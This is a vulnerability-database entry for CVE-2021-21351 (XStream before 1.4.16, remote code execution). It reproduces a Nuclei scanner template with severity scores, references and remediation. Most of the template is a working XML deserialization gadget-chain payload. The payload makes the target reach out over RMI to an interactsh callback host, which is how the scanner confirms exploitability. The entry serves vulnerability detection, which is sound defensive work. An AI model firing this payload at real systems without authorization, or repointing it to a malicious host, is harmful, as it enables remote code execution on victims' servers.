NUCLEI:CVE-2021-21351 (nuclei template, ProjectDiscovery)
History: Mar 12, 2023 - 3:38 a.m.

XStream <1.4.16 - Remote Code Execution

Published: 2023-03-12 03:38:05
Source: ProjectDiscovery (github.com)
CVSS3: 9.1 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: HIGH
  User Interaction: NONE
  Scope: CHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

AI Score: 9.5 High (Confidence: High)

CVSS2: 6.5 Medium
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: SINGLE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL
  Vector: AV:N/AC:L/Au:S/C:P/I:P/A:P

EPSS: 0.644 Medium (Percentile: 97.8%)

XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
id: CVE-2021-21351

info:
  name: XStream <1.4.16 - Remote Code Execution
  author: pwnhxl
  severity: critical
  description: |
    XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
  remediation: Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351
    - https://x-stream.github.io/CVE-2021-21351.html
    - https://paper.seebug.org/1543/
    - http://x-stream.github.io/changes.html#1.4.16
    - https://nvd.nist.gov/vuln/detail/CVE-2021-21351
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.1
    cve-id: CVE-2021-21351
    cwe-id: CWE-434
    epss-score: 0.73084
    epss-percentile: 0.98014
    cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: xstream_project
    product: xstream
  tags: cve2021,cve,xstream,deserialization,rce,oast,vulhub,xstream_project

http:
  - raw:
      - |
        POST / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <sorted-set>
          <javax.naming.ldap.Rdn_-RdnEntry>
            <type>ysomap</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
              <m__DTMXRTreeFrag>
                <m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
                  <m__size>-10086</m__size>
                  <m__mgrDefault>
                    <__overrideDefaultParser>false</__overrideDefaultParser>
                    <m__incremental>false</m__incremental>
                    <m__source__location>false</m__source__location>
                    <m__dtms>
                      <null/>
                    </m__dtms>
                    <m__defaultHandler/>
                  </m__mgrDefault>
                  <m__shouldStripWS>false</m__shouldStripWS>
                  <m__indexing>false</m__indexing>
                  <m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
                    <fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
                      <javax.sql.rowset.BaseRowSet>
                        <default>
                          <concurrency>1008</concurrency>
                          <escapeProcessing>true</escapeProcessing>
                          <fetchDir>1000</fetchDir>
                          <fetchSize>0</fetchSize>
                          <isolation>2</isolation>
                          <maxFieldSize>0</maxFieldSize>
                          <maxRows>0</maxRows>
                          <queryTimeout>0</queryTimeout>
                          <readOnly>true</readOnly>
                          <rowSetType>1004</rowSetType>
                          <showDeleted>false</showDeleted>
                          <dataSource>rmi://{{interactsh-url}}/test</dataSource>
                          <listeners/>
                          <params/>
                        </default>
                      </javax.sql.rowset.BaseRowSet>
                      <com.sun.rowset.JdbcRowSetImpl>
                        <default/>
                      </com.sun.rowset.JdbcRowSetImpl>
                    </fPullParserConfig>
                    <fConfigSetInput>
                      <class>com.sun.rowset.JdbcRowSetImpl</class>
                      <name>setAutoCommit</name>
                      <parameter-types>
                        <class>boolean</class>
                      </parameter-types>
                    </fConfigSetInput>
                    <fConfigParse reference='../fConfigSetInput'/>
                    <fParseInProgress>false</fParseInProgress>
                  </m__incrementalSAXSource>
                  <m__walker>
                    <nextIsRaw>false</nextIsRaw>
                  </m__walker>
                  <m__endDocumentOccured>false</m__endDocumentOccured>
                  <m__idAttributes/>
                  <m__textPendingStart>-1</m__textPendingStart>
                  <m__useSourceLocationProperty>false</m__useSourceLocationProperty>
                  <m__pastFirstElement>false</m__pastFirstElement>
                </m__dtm>
                <m__dtmIdentity>1</m__dtmIdentity>
              </m__DTMXRTreeFrag>
              <m__dtmRoot>1</m__dtmRoot>
              <m__allowRelease>false</m__allowRelease>
            </value>
          </javax.naming.ldap.Rdn_-RdnEntry>
          <javax.naming.ldap.Rdn_-RdnEntry>
            <type>ysomap</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
              <m__obj class='string'>test</m__obj>
            </value>
          </javax.naming.ldap.Rdn_-RdnEntry>
        </sorted-set>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - "timestamp"
          - "com.thoughtworks.xstream"
        condition: or

      - type: word
        part: header
        words:
          - "application/json"

      - type: status
        status:
          - 500
# digest: 4b0a00483046022100f29c7be274baa128b1b19d0598c8a3d7805a5f14b3073a1aa9d6dae05ad2a533022100a39cddf06232b2de875c43c80596a232347000e49418a3f927b430ed8c8abbfc:922c64590222798bb761d5b6d8e72950